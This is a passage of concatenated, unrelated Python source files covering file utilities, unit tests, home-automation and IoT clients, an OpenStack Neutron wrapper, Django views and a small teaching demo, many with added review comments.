        # BUG FIX: the optional `message` parameter was accepted but
        # silently ignored; honour it, falling back to the default text.
        if message is None:
            message = 'Expected a directory, found a file instead at ' + directory
        super(NotADirectoryError, self).__init__(message)
        #: Absolute path of the offending entry.
        self.directory = os.path.abspath(directory)
def remove_directory(directory, show_warnings=True):
    """Deletes a directory and its contents.
    Returns a list of errors in form (function, path, excinfo)."""
    # Python 2 module (print statement syntax below).
    errors = []
    def onerror(function, path, excinfo):
        # Collect each deletion failure instead of letting shutil.rmtree
        # abort on the first error.
        # NOTE(review): the warning prints the top-level `directory`, not
        # the failing `path` -- confirm that is intended.
        if show_warnings:
            print 'Cannot delete %s: %s' % (os.path.relpath(directory), excinfo[1])
        errors.append((function, path, excinfo))
    if os.path.exists(directory):
        if not os.path.isdir(directory):
            # A plain file at this path is a caller error, not a deletion
            # failure to collect.
            raise NotADirectoryError(directory)
        shutil.rmtree(directory, onerror=onerror)
    return errors
def copy_files(source_files, target_directory, source_directory=None):
    """Copies a list of files to the specified directory.
    If source_directory is provided, it will be prepended to each source file."""
    try:
        os.makedirs(target_directory)
    except OSError:
        # FIX: narrowed the former bare `except` (which hid every error) to
        # OSError -- the expected failure when the directory already exists.
        # A genuinely uncreatable target still surfaces via copy2 below.
        pass
    for f in source_files:
        source = os.path.join(source_directory, f) if source_directory else f
        target = os.path.join(target_directory, f)
        shutil.copy2(source, target)
def yes_or_no(message):
    """Gets user input and returns True for yes and False for no."""
    # Python 2 only: print statement and raw_input.
    # Loops until an unambiguous answer is given; 'y'/'ye'/'yes' and
    # 'n'/'no' (case-insensitive) are accepted.
    while True:
        print message, '(yes/no)',
        line = raw_input()
        if line is None:
            return None
        line = line.lower()
        if line == 'y' or line == 'ye' or line == 'yes':
            return True
        if line == 'n' or line == 'no':
            return False
|
from oarepo_nusl_rules import rule_registry
from oarepo_nusl_rules.register import RuleRegistry
def test_register_load():
    """load() populates the registry and Instance() is a true singleton."""
    first = RuleRegistry.Instance()
    RuleRegistry.Instance().load()
    second = RuleRegistry.Instance()
    assert len(RuleRegistry.Instance().rules) > 0
    assert first is second
def test_register_instance():
    """The module-level rule_registry is the singleton instance."""
    assert rule_registry is RuleRegistry.Instance()
|
"""API for Somfy bound to Open Peer Power OAuth."""
from __future__ import annotations
from asyncio import run_coroutine_threadsafe
from pymfy.api import somfy_api
from openpeerpower import config_entries, core
from openpeerpower.helpers import config_entry_oauth2_flow
class ConfigEntrySomfyApi(somfy_api.SomfyApi):
    """Provide a Somfy API tied into an OAuth2 based config entry."""
    def __init__(
        self,
        opp: core.OpenPeerPower,
        config_entry: config_entries.ConfigEntry,
        implementation: config_entry_oauth2_flow.AbstractOAuth2Implementation,
    ) -> None:
        """Initialize the Config Entry Somfy API."""
        self.opp = opp
        self.config_entry = config_entry
        # The OAuth2 session owns token storage and refresh for this entry.
        self.session = config_entry_oauth2_flow.OAuth2Session(
            opp, config_entry, implementation
        )
        # client_id/client_secret are passed as None: authentication is
        # carried entirely by the session-managed token.
        super().__init__(None, None, token=self.session.token)
    def refresh_tokens(
        self,
    ) -> dict[str, str | int]:
        """Refresh and return new Somfy tokens using Open Peer Power OAuth2 session."""
        # Bridge into the event loop and block until the refresh completes;
        # run_coroutine_threadsafe is only safe when this is called from a
        # thread other than the loop's own (presumably a pymfy worker --
        # TODO confirm).
        run_coroutine_threadsafe(
            self.session.async_ensure_token_valid(), self.opp.loop
        ).result()
        return self.session.token
|
import json
import time
from enum import Enum
def current_time():
    """Return the current epoch time in whole milliseconds."""
    millis = time.time() * 1000
    return int(round(millis))
def add_leading_zero(value):
    """Return *value* as a string, left-padded with '0' when below 10.

    NOTE(review): negative inputs yield e.g. '0-5' -- presumably only
    non-negative clock components are expected; confirm against callers.
    """
    if value < 10:
        return "0" + str(value)
    return str(value)
def to_JSON(obj, sort_keys=True):
    """Serialize *obj* to a 4-space-indented JSON string.

    Enums serialize to their value; other objects to their public
    (non-underscore) attributes.
    """
    return json.dumps(
        obj,
        default=default_serializer,
        sort_keys=sort_keys,
        indent=4,
    )


def default_serializer(obj):
    """JSON serializer for objects not serializable by default json code"""
    if isinstance(obj, Enum):
        return obj.value
    return {name: attr for name, attr in obj.__dict__.items()
            if not name.startswith("_")}
def write_size(data):
    """Format a byte count as a short human-readable string.

    Thresholds use 1100 multiples so values just over a unit boundary
    (e.g. 1050) stay in the smaller unit.
    """
    if data < 1100:
        return str(data) + 'b'
    if data < 1100000:
        return str(round(data / 1000, 0)) + 'kb'
    if data < 1100000000:
        return str(round(data / 1000000, 2)) + 'mb'
    if data < 1100000000000:
        return str(round(data / 1000000000, 2)) + 'gb'
    else:
        # BUG FIX: the terabyte branch previously divided by 1e9 (the
        # gigabyte divisor), e.g. reporting 2 TB as '2000.0tb'.
        return str(round(data / 1000000000000, 2)) + 'tb'
class Singleton(type):
    """Metaclass that caches exactly one instance per class.

    The first call constructs the instance; every later call returns the
    cached one, constructor arguments ignored.
    """
    _instances = {}

    def __call__(cls, *args, **kwargs):
        try:
            return cls._instances[cls]
        except KeyError:
            instance = super(Singleton, cls).__call__(*args, **kwargs)
            cls._instances[cls] = instance
            return instance
# Browser-like default HTTP request headers, useful for servers that
# reject clients without a realistic User-Agent.
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
    'Accept-Encoding': 'none',
    'Accept-Language': 'en-US,en;q=0.8',
    'Connection': 'keep-alive'}
|
"""Packaging script for the ``doctor`` distribution."""
import os
from setuptools import setup

# Read __version__ from doctor/_version.py without importing the package
# (importing could fail before its dependencies are installed).
version_file_path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
                                 'doctor', '_version.py')
with open(version_file_path, 'r') as version_file:
    exec(compile(version_file.read(), version_file_path, 'exec'))
setup(
    # BUG FIX: the original used ``name=__name__``, which evaluates to
    # '__main__' when setup.py is executed as a script, producing a
    # distribution named '__main__'. Use the literal package name instead.
    name='doctor',
    version=__version__,  # noqa -- flake8 should ignore this line
    description='The doctor is in.',
    url='https://github.com/noonat/doctor',
    author='Nathan Ostgard',
    author_email='no@nathanostgard.com',
    license='MIT',
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: Implementation :: CPython',
        'Programming Language :: Python :: Implementation :: PyPy',
    ],
    packages=['doctor'],
    install_requires=[
        'jsonschema>=2.5.1,<3.0.0',
        'six>=1.9.0,<2.0.0',
    ],
    extras_require={
        'docs': [
            'sphinx',
        ],
        'tests': [
            'flake8',
            'mock',
            'pytest',
            'pytest-cov',
        ],
    }
)
|
#
# Copyright 2014 OpenStack Foundation
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutronclient.common import exceptions as neutron_client_exc
from neutronclient.v2_0 import client as clientv20
from oslo.config import cfg
from ironic.api import acl
from ironic.common import exception
from ironic.common import keystone
from ironic.common import tftp
from ironic.openstack.common import log as logging
# Configuration options for reaching the neutron API endpoint.
neutron_opts = [
    cfg.StrOpt('url',
               default='http://127.0.0.1:9696',
               help='URL for connecting to neutron.'),
    cfg.IntOpt('url_timeout',
               default=30,
               help='Timeout value for connecting to neutron in seconds.')
]
CONF = cfg.CONF
# my_ip is declared in ironic.netconf; import it so it is usable here.
CONF.import_opt('my_ip', 'ironic.netconf')
CONF.register_opts(neutron_opts, group='neutron')
acl.register_opts(CONF)
LOG = logging.getLogger(__name__)
class NeutronAPI(object):
    """API for communicating to neutron 2.x API."""
    def __init__(self, context):
        # When the request context carries no auth token, fall back to the
        # service's own admin credentials from [keystone_authtoken];
        # otherwise reuse the caller's token directly.
        self.context = context
        self.client = None
        params = {
            'timeout': CONF.neutron.url_timeout,
            'insecure': CONF.keystone_authtoken.insecure,
            'ca_cert': CONF.keystone_authtoken.certfile,
        }
        if context.auth_token is None:
            params['endpoint_url'] = (CONF.neutron.url or
                                      keystone.get_service_url('neutron'))
            params['username'] = CONF.keystone_authtoken.admin_user
            params['tenant_name'] = CONF.keystone_authtoken.admin_tenant_name
            params['password'] = CONF.keystone_authtoken.admin_password
            params['auth_url'] = (CONF.keystone_authtoken.auth_uri or '')
        else:
            params['token'] = context.auth_token
            params['endpoint_url'] = CONF.neutron.url
            params['auth_strategy'] = None
        self.client = clientv20.Client(**params)
    def update_port_dhcp_opts(self, port_id, dhcp_options):
        """Update a port's attributes.
        Update one or more DHCP options on the specified port.
        For the relevant API spec, see
        http://docs.openstack.org/api/openstack-network/2.0/content/extra-dhc-opt-ext-update.html # noqa
        :param port_id: designate which port these attributes
                        will be applied to.
        :param dhcp_options: this will be a list of dicts, e.g.
                             [{'opt_name': 'bootfile-name',
                               'opt_value': 'pxelinux.0'},
                              {'opt_name': 'server-ip-address',
                               'opt_value': '123.123.123.456'},
                              {'opt_name': 'tftp-server',
                               'opt_value': '123.123.123.123'}]
        :raises: FailedToUpdateDHCPOptOnPort
        """
        port_req_body = {'port': {'extra_dhcp_opts': dhcp_options}}
        try:
            self.client.update_port(port_id, port_req_body)
        except neutron_client_exc.NeutronClientException:
            # Translate the client error into an ironic-level exception.
            LOG.exception(_("Failed to update Neutron port %s."), port_id)
            raise exception.FailedToUpdateDHCPOptOnPort(port_id=port_id)
    def update_port_address(self, port_id, address):
        """Update a port's mac address.
        :param port_id: Neutron port id.
        :param address: new MAC address.
        :raises: FailedToUpdateMacOnPort
        """
        port_req_body = {'port': {'mac_address': address}}
        try:
            self.client.update_port(port_id, port_req_body)
        except neutron_client_exc.NeutronClientException:
            LOG.exception(_("Failed to update MAC address on Neutron port %s."
                            ), port_id)
            raise exception.FailedToUpdateMacOnPort(port_id=port_id)
def get_node_vif_ids(task):
    """Get all Neutron VIF ids for a node.
    This function does not handle multi node operations.
    :param task: a TaskManager instance.
    :returns: A dict of the Node's port UUIDs and their associated VIFs
    """
    vif_map = {}
    for node_port in task.ports:
        vif_id = node_port.extra.get('vif_port_id')
        # Ports without an attached VIF are simply omitted from the result.
        if vif_id:
            vif_map[node_port.uuid] = vif_id
    return vif_map
def update_neutron(task, pxe_bootfile_name):
    """Send or update the DHCP BOOT options to Neutron for this node.

    :param task: a TaskManager instance.
    :param pxe_bootfile_name: PXE boot file to advertise via DHCP options.
    :raises: FailedToUpdateDHCPOptOnPort when the options could not be set
        on ANY of the node's ports (partial failures only log a warning).
    """
    options = tftp.dhcp_options_for_instance(pxe_bootfile_name)
    vifs = get_node_vif_ids(task)
    if not vifs:
        LOG.warning(_("No VIFs found for node %(node)s when attempting to "
                      "update Neutron DHCP BOOT options."),
                    {'node': task.node.uuid})
        return
    # TODO(deva): decouple instantiation of NeutronAPI from task.context.
    #             Try to use the user's task.context.auth_token, but if it
    #             is not present, fall back to a server-generated context.
    #             We don't need to recreate this in every method call.
    api = NeutronAPI(task.context)
    failures = []
    # FIX: use items() instead of the Python-2-only dict.iteritems(); the
    # iteration behavior is identical and the code stays Python-3 compatible.
    for port_id, port_vif in vifs.items():
        try:
            api.update_port_dhcp_opts(port_vif, options)
        except exception.FailedToUpdateDHCPOptOnPort:
            failures.append(port_id)
    if failures:
        if len(failures) == len(vifs):
            raise exception.FailedToUpdateDHCPOptOnPort(_(
                "Failed to set DHCP BOOT options for any port on node %s.") %
                task.node.uuid)
        else:
            LOG.warning(_("Some errors were encountered when updating the "
                          "DHCP BOOT options for node %(node)s on the "
                          "following ports: %(ports)s."),
                        {'node': task.node.uuid, 'ports': failures})
|
import unittest2 as unittest
from Acquisition import aq_base
from plone.app.testing import TEST_USER_ID, setRoles
from collective.teamwork.tests.layers import DEFAULT_PROFILE_TESTING
from collective.teamwork.interfaces import IProjectContext, IWorkspaceContext
from fixtures import CreateContentFixtures
class UtilityTest(unittest.TestCase):
    """
    Test functions of collective.teamwork.utils
    """
    THEME = 'Sunburst Theme'
    layer = DEFAULT_PROFILE_TESTING
    def setUp(self):
        # The test layer supplies a Plone portal; fixtures create the
        # project/workspace content tree the assertions below rely on.
        self.portal = self.layer['portal']
        setRoles(self.portal, TEST_USER_ID, ['Manager'])
        CreateContentFixtures(self, self.layer).create()
    def same(self, a, b):
        # Identity comparison with acquisition wrappers stripped.
        return aq_base(a) is aq_base(b)
    def test_get_projects(self):
        # get_projects() should find exactly the project objects in the
        # portal root, with and without an explicit site argument.
        from collective.teamwork.utils import get_projects, get_workspaces
        from zope.component.hooks import getSite
        assert self.same(getSite(), self.portal)
        assert len(get_projects()) < len(get_workspaces())
        assert len(get_projects()) == len(get_projects(self.portal))
        assert len(get_projects()) == 2
        isproject = lambda o: IProjectContext.providedBy(o)
        for project in get_projects():
            assert isproject(project)
        found = get_projects()
        for project in filter(isproject, self.portal.objectValues()):
            assert project in found
    def test_get_workspaces(self):
        # Workspaces include projects plus nested team workspaces, sorted
        # with items closest to the portal root first.
        from collective.teamwork.utils import get_workspaces
        project1 = self.portal['project1']
        # test without context, without site
        workspaces = get_workspaces()
        assert len(workspaces) == 5
        # test sort order, items closest to root first
        assert self.same(workspaces[0], project1)
        assert all(
            map(lambda o: IWorkspaceContext.providedBy(o), workspaces)
            )
        # after first two workspaces, remainder are not projects
        assert all(
            map(lambda o: not IProjectContext.providedBy(o), workspaces[2:])
            )
        _path = lambda o: o.getPhysicalPath()
        assert len(_path(workspaces[2])) > len(_path(workspaces[0]))
        # test without context, passing site
        found = get_workspaces()
        assert len(found) == len(workspaces)
        for workspace in found:
            assert workspace in workspaces
        # test with context
        contained_workspaces = get_workspaces(project1)
        assert len(contained_workspaces) == 3
    def test_project_for(self):
        # Any content inside a project resolves to its containing project,
        # both via the helper and via interface adaptation.
        from collective.teamwork.utils import project_for
        path = 'project1/team1/stuff'
        content = self.portal.unrestrictedTraverse(path)
        project_expected = self.portal['project1']
        assert self.same(project_for(content), project_expected)
        assert self.same(IProjectContext(content), project_expected)
    def test_workspace_for(self):
        # Content resolves to its *nearest* enclosing workspace (team1),
        # not the top-level project.
        from collective.teamwork.utils import workspace_for
        path = 'project1/team1/stuff'
        content = self.portal.unrestrictedTraverse(path)
        workspace_expected = self.portal['project1']['team1']
        assert self.same(workspace_for(content), workspace_expected)
        assert self.same(IWorkspaceContext(content), workspace_expected)
    def test_parent_workspaces(self):
        # parent_workspaces() lists enclosing workspaces outermost-first.
        from collective.teamwork.utils import parent_workspaces
        path = 'project1/team1/stuff'
        content = self.portal.unrestrictedTraverse(path)
        project_expected = self.portal['project1']
        workspace_expected = project_expected['team1']
        parents = parent_workspaces(content)
        assert len(parents) == 2
        assert self.same(parents[-1], workspace_expected)
        assert self.same(parents[-2], project_expected)
    def test_utility_view(self):
        # The browser view exposes the same lookups as the module helpers.
        from collective.teamwork.utils import make_request
        from collective.teamwork.utils import WorkspaceUtilityView
        from collective.teamwork.utils import workspace_for, project_for
        request = make_request()
        path = 'project1/team1/stuff'
        content = self.portal.unrestrictedTraverse(path)
        view = WorkspaceUtilityView(content, request)
        assert isinstance(view(), str)  # calling returns string label
        assert self.same(view.workspace(), workspace_for(content))
        assert self.same(view.workspace(), IWorkspaceContext(content))
        assert self.same(view.project(), project_for(content))
        assert self.same(view.project(), IProjectContext(content))
|
"""
Na relação de associação um objeto pode existir sem o outro,
ma existe a possibilidade de um deles usar uma instância do outro.
"""
class Bombeiro():
    """A firefighter that can be associated with a tool (e.g. a vehicle)."""

    def __init__(self, nome):
        self.__nome = nome
        self.__ferramenta = None  # no tool associated initially

    @property
    def nome(self):
        # The getter tags the stored name so property access is observable.
        return (self.__nome + '_getter').upper()

    @nome.setter
    def nome(self, novo_nome):
        # The setter tags the assigned value before storing it.
        self.__nome = novo_nome + '_setter'

    @property
    def ferramenta(self):
        return self.__ferramenta

    @ferramenta.setter
    def ferramenta(self, nova_ferramenta):
        self.__ferramenta = nova_ferramenta
class Veiculo():
    """A vehicle with a shared class-level fuel attribute."""

    combust = 'gasolina'  # class attribute, shared until shadowed per-instance

    def __init__(self, tipo, placa):
        self.__tipo = tipo
        self._placa = placa

    @property
    def tipo(self):
        return self.__tipo

    @tipo.setter
    def tipo(self, novo_tipo):
        # Stored upper-cased, so reads after a set return the upper-case form.
        self.__tipo = novo_tipo.upper()
# Demo: property getters/setters transform the stored name on each access.
bombeiro_1 = Bombeiro('Jackson')
print(bombeiro_1.nome)
bombeiro_1.nome = 'João'
print(bombeiro_1.nome)
bombeiro_1.ferramenta = Veiculo('camihão', 'orh6375')
# ↑ creates a Veiculo object associated with the Bombeiro object
print(bombeiro_1.ferramenta._placa)
# Assigning through the instance shadows the class attribute 'combust'
# for this instance only; Veiculo.combust itself stays 'gasolina'.
bombeiro_1.ferramenta.combust = 'água'
print(bombeiro_1.ferramenta.combust)
print(bombeiro_1.ferramenta.tipo)
print(Veiculo.combust)
|
from typing import Any, Dict, Union
from tealprint import TealPrint
from tealprint.teallevel import TealLevel
from ...core.entities.color import Color
from ..interface import Interface
from ..moods import Mood
from .api import Api
class HueInterface(Interface):
    """Philips Hue light/group addressed through the Hue REST API.

    The numeric Hue id is resolved lazily from the interface name and all
    state changes are PUT to ``/<type>/<id>/<action>``.
    """

    INVALID_ID = -1

    def __init__(self, name: str, type: str, action: str) -> None:
        super().__init__(name)
        self._id = HueInterface.INVALID_ID  # resolved lazily by the id property
        self.type = type
        self.action = action

    @property
    def id(self) -> int:
        """Numeric Hue id, looked up by name on first access."""
        if self._id == HueInterface.INVALID_ID:
            self._id = self._get_id()
            if self._id != HueInterface.INVALID_ID:
                TealPrint.info(f"ℹ Found id {self._id} for HueInterface {self.name}")
            else:
                TealPrint.warning(f"⚠ Could not find id for HueInterface {self.name}")
        return self._id

    @id.setter
    def id(self, id: int):
        self._id = id

    def _get_id(self) -> int:
        """Find this interface's id by case-insensitive name match."""
        # Get all interfaces of type.
        # FIX: renamed locals — the original used "all" and "object",
        # shadowing the builtins of the same name.
        interfaces = Api.get(f"/{self.type}")
        if not interfaces:
            TealPrint.warning(f"⚠ Could not get all /{self.type} for {self.name}")
            return HueInterface.INVALID_ID
        for id_str, info in interfaces.items():
            if "name" in info:
                name = str(info["name"])
                if name.lower() == self.name.lower():
                    return int(id_str)
        return HueInterface.INVALID_ID

    def _get_data(self) -> Union[Dict[str, Any], None]:
        return Api.get(f"/{self.type}/{self.id}")

    def _get_state(self) -> Union[Dict[str, Any], None]:
        """Return the dict under self.action, or None if unavailable."""
        data = self._get_data()
        if data and self.action in data:
            state = data[self.action]
            if isinstance(state, dict):
                return state
        # FIX: explicit None instead of an implicit fall-through return.
        return None

    def turn_on(self) -> None:
        self._put({"on": True})

    def turn_off(self) -> None:
        self._put({"on": False})

    def toggle(self) -> None:
        new_state = not self.is_on()
        self._put({"on": new_state})

    def is_on(self) -> bool:
        state = self._get_state()
        if state and "on" in state:
            return state["on"]
        return False

    def dim(self, value: Union[float, int], transition_time: float = 1) -> None:
        """Turn on and set brightness over *transition_time* seconds."""
        normalized_value = Interface.normalize_dim(value)
        normalized_time = Interface.normalize_transition_time(transition_time)
        self._put(
            {
                "on": True,
                "bri": normalized_value,
                "transitiontime": normalized_time,
            }
        )

    def color(self, color: Color, transition_time: float = 1) -> None:
        """Apply the first color component set on *color*: xy, hue, sat, or ct."""
        normalized_time = Interface.normalize_transition_time(transition_time)
        body = {
            "on": True,
            "transitiontime": normalized_time,
        }
        if color.x and color.y:
            body["xy"] = [color.x, color.y]
        elif color.hue:
            body["hue"] = color.hue
        elif color.saturation:
            body["sat"] = color.saturation
        elif color.temperature:
            body["ct"] = color.temperature
        else:
            # FIX: dropped the needless f-prefix (f-string had no placeholders).
            TealPrint.warning("⚠🚦 Didn't specify any color when calling color()")
            return
        self._put(body)

    def mood(self, mood: Mood) -> None:
        self.dim(mood.brightness)
        self.color(mood.color)

    def _put(self, body: Dict[str, Any]) -> None:
        url = f"/{self.type}/{self.id}/{self.action}"
        TealPrint.verbose(f"📞 Hue API: {url}, body: {body}")
        Api.put(url, body)
|
# (C) Copyright 2020- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
from __future__ import absolute_import, unicode_literals
import os
import pytest
from servicelib.context.service import ServiceContext
from servicelib.core import Request
def test_trackers_vary_per_request(servicelib_yaml):
    # Two contexts built from distinct Requests must not share a tracker.
    c1 = ServiceContext("some-service", "/some/dir", None, Request())
    c2 = ServiceContext("some-service", "/some/dir", None, Request())
    assert c1.tracker != c2.tracker
def test_create_temp_file(context):
    # Temp files created through the context exist on disk.
    fname = context.create_temp_file()
    assert os.access(fname, os.F_OK)
def test_temp_files_are_removed(context):
    # cleanup() removes context-created temp files.
    fname = context.create_temp_file()
    context.cleanup()
    assert not os.access(fname, os.F_OK)
def test_handle_errors_in_temp_file_cleanup(context):
    # cleanup() must tolerate temp files already removed by someone else.
    fname = context.create_temp_file()
    os.unlink(fname)
    context.cleanup()
    assert not os.access(fname, os.F_OK)
def test_create_result(context):
    # Result metadata exposes location, content type and length.
    r = context.create_result("text/plain").as_dict()
    assert "location" in r
    assert "contentType" in r
    assert "contentLength" in r
def test_get_data_downloads_only_once(context):
    # Fetching the same location twice reuses the cached download.
    location = {"location": "https://www.ecmwf.int/"}
    one = context.get_data(location)
    assert one.stat()
    two = context.get_data(location)
    assert two.stat()
    assert one == two
def test_get_data_files_persist(context):
    # Downloaded data files survive context cleanup.
    fname = context.get_data({"location": "https://www.ecmwf.int/"})
    context.cleanup()
    assert fname.stat()
def test_download_unsupported_url_schemes(context):
    # Non-HTTP(S) schemes are rejected with a descriptive error.
    with pytest.raises(Exception) as exc:
        context.get_data({"location": "ftp://localhost/whatever"})
    assert str(exc.value) == "ftp://localhost/whatever: Unsupported URL scheme 'ftp'"
def test_download_errors(context):
    # Unresolvable hosts surface as exceptions rather than silent failures.
    with pytest.raises(Exception):
        context.get_data({"location": "http://no-such-host"})
|
# Sample input list for the in-place reversal demo below.
a = [1,2,3,4,5,6]
def reverse(l:list):
    """Reverse *l* in place by swapping symmetric pairs, and return it."""
    lo, hi = 0, len(l) - 1
    while lo < hi:
        # Swap the outermost unswapped pair, then move both ends inward.
        l[lo], l[hi] = l[hi], l[lo]
        lo += 1
        hi -= 1
    return l
# The list is reversed in place, so ``result`` aliases ``a``.
result = reverse(a)
print(result)
#encoding: utf-8
from django.shortcuts import render
from django.http import JsonResponse
from .models import Client
from base import constants
from base.decorators import login_required
@login_required
def lists(request):
    """Client listing: JSON payload for AJAX requests, HTML page otherwise."""
    if request.is_ajax():
        # ok_objects appears to be a manager filtering to active clients —
        # NOTE(review): confirm against the Client model.
        result = [client.as_dict(True) for client in Client.ok_objects.all()]
        return JsonResponse({'status' : constants.HTTP_STATUS_OK, 'result' : result})
    else:
        return render(request, 'agent/list.html')
@login_required
def delete(request):
    """Delete the client identified by the POSTed ``id`` and return OK."""
    # NOTE(review): ``id`` is None when the parameter is missing — verify
    # Client.delete handles that case gracefully.
    id = request.POST.get('id')
    Client.delete(id)
    return JsonResponse({'status' : constants.HTTP_STATUS_OK})
|
import json
import network
import time
import math
import umqtt.simple as simple
import machine
import random
from util import Config, wait_network
# WiFi station interface; its MAC address doubles as the device ID.
sta_if = network.WLAN(network.STA_IF)
conf = Config('ibmiot')
# First boot: generate and persist a device identity and auth token.
if not conf.data:
    random.seed(time.time())
    conf.data = {
        'orgID': 'quickstart', # <<< org_id
        'deviceType': 'badge2018',
        'deviceID': ''.join('{:02X}'.format(c) for c in sta_if.config('mac')),
        'user': 'use-token-auth',
        'authToken': 'badge{}'.format(str(random.random()).split('.')[1]),
    }
    conf.save()
# IBM Watson IoT client id format: d:<org>:<type>:<device>.
clientID = 'd:' + conf.data['orgID'] + ':' + conf.data['deviceType'] + ':' + conf.data['deviceID']
broker = conf.data['orgID'] + '.messaging.internetofthings.ibmcloud.com'
# MQTT topics: events published by the device, commands received from the cloud.
statusTopic = b'iot-2/evt/status/fmt/json'
signalTopic = b'iot-2/evt/signal/fmt/json'
ledCommandTopic = b'iot-2/cmd/led/fmt/json'
irCommandTopic = b'iot-2/cmd/ir/fmt/json'
# Quickstart orgs are unauthenticated/no-TLS; registered orgs use token auth.
if conf.data['orgID'] == 'quickstart':
    c = simple.MQTTClient(clientID, broker, ssl=False)
    print('Quickstart URL: https://quickstart.internetofthings.ibmcloud.com/#/device/{}/sensor/'.format(
        conf.data['deviceID']))
else:
    c = simple.MQTTClient(clientID, broker,
                          user=conf.data['user'], password=conf.data['authToken'], ssl=True)
# LED
led_red = machine.Pin(17, machine.Pin.OUT, value=0)
#led_blue = machine.Pin(16, machine.Pin.OUT, value=0)
# IR
# RMT peripheral channels for receiving and transmitting IR signals.
rx = machine.RMT(rmt_mode=machine.RMT.RX,
                 channel=4, clk_div=80, pin=machine.Pin(26), mem_block_num=4)
rx.config(filter_en=True, filter_ticks_thresh=100, idle_threshold=30000, rx_buf_size=4000)
tx = machine.RMT(rmt_mode=machine.RMT.TX,
                 channel=0, clk_div=80, pin=machine.Pin(16), mem_block_num=4)
tx.config()
def sub_cb(topic, msg):
    """MQTT subscription callback: dispatch LED and IR commands by topic."""
    obj = json.loads(msg)
    print((topic, msg, obj))
    if topic == ledCommandTopic:
        led_cb(obj)
    elif topic == irCommandTopic:
        ir_cb(obj)
    else:
        print('Unknown topic: {}'.format(topic))
def led_cb(obj):
    """Handle an LED command of shape {'d': {'target': ..., 'action': ...}}.

    Supported targets: 'red', 'blue'; actions: 'on', 'off', 'toggle'.
    """
    if obj['d']['target'] == 'red':
        led = led_red
    elif obj['d']['target'] == 'blue':
        # BUG FIX: led_blue is commented out in the hardware setup above, so
        # referencing it directly raised NameError inside the MQTT callback.
        # Look it up defensively and report instead of crashing.
        led = globals().get('led_blue')
        if led is None:
            print('Blue LED is not available on this board')
            return
    else:
        print('Unknown target')
        return
    if obj['d']['action'] == 'on':
        led.value(1)
    elif obj['d']['action'] == 'off':
        led.value(0)
    elif obj['d']['action'] == 'toggle':
        led.value(1 if led.value() == 0 else 0)
    else:
        print('Unknown action')
        return
def ir_cb(obj):
    """Handle an IR command: 'record' captures and publishes a signal,
    'send' transmits a previously captured one."""
    if obj['d']['action'] == 'record':
        print('Recording IR signal..')
        cmd = rx.receive()
        # Invert each pulse's level bits before publishing —
        # NOTE(review): presumably to normalize RX polarity for later TX;
        # confirm against the RMT driver's documentation.
        rcmd = list(map(lambda x: [[x[0][0], 1 - x[0][1]], [x[1][0], 1 - x[1][1]]], cmd))
        print(rcmd)
        c.publish(signalTopic, json.dumps({'d': {'cmd': rcmd}}))
    elif obj['d']['action'] == 'send':
        tx.send(obj['d']['cmd'])
def sineVal(minValue, maxValue, duration, count):
    """Return a sine sample oscillating between minValue and maxValue.

    :param minValue: lower bound of the oscillation.
    :param maxValue: upper bound of the oscillation.
    :param duration: number of samples per full sine period.
    :param count: sample index.
    :returns: the value formatted with two decimal places (str).
    """
    amplitude = (maxValue - minValue) / 2.0
    midpoint = (maxValue + minValue) / 2.0
    # BUG FIX: add the midpoint offset. The original only scaled by the
    # amplitude, so ranges not centered on zero never reached their bounds.
    # Behavior for the existing (-1.0, 1.0) call site is unchanged.
    sineValue = math.sin(2.0 * math.pi * count / duration) * amplitude + midpoint
    return '{:.2f}'.format(sineValue)
def main():
    """Connect to the IBM IoT broker, publish a sine sample every 10 s,
    and service incoming LED/IR command messages.

    :raises Exception: when the WiFi network cannot be joined.
    """
    c.set_callback(sub_cb)
    if not wait_network():
        print('Cannot connect WiFi')
        raise Exception('Cannot connect WiFi')
    c.connect()
    # Command subscriptions are only supported on registered (non-quickstart) orgs.
    if conf.data['orgID'] != 'quickstart':
        c.subscribe(ledCommandTopic)
        c.subscribe(irCommandTopic)
    print('Connected, waiting for event ({})'.format(conf.data['deviceID']))
    status = {'d': {'sine': {}}}
    count = 0
    try:
        while True:
            status['d']['sine'] = sineVal(-1.0, 1.0, 16, count)
            count += 1
            c.publish(statusTopic, json.dumps(status))
            time.sleep_ms(10000)
            # Non-blocking poll for pending command messages.
            #c.wait_msg()
            c.check_msg()
    finally:
        c.disconnect()
        # FIX: corrected typo in the log message ('Disonnected').
        print('Disconnected')
|
import re
import time
import random
import datetime
from faker import Faker
# ----------------------------------------------------------------------
# # Do something
# ----------------------------------------------------------------------
def str_list(_str):
_str = _str.strip("['").strip("']")
_list = _str.replace("', '", "|")
return _list.split('|')
def set_global(set_global_vars, response_text):
    """Extract named values from a response via query paths.

    Returns False when set_global_vars is None, otherwise a dict mapping
    each variable name to the (stringified) value located by its query.
    """
    # response payload example:
    # response_text = {"headers": {"Host": "666666"}}
    # set_global_vars = [{'name': 'test', 'query': ['headers', 'Host']}]
    global_vars = dict()
    new_temp_suite_params = dict()
    temp_suite_params = dict()
    if set_global_vars == None:
        return False
    if set_global_vars and isinstance(set_global_vars, list):
        for set_global_var in set_global_vars:
            # Only entries with a non-empty string 'name' are processed.
            if isinstance(set_global_var, dict) and isinstance(
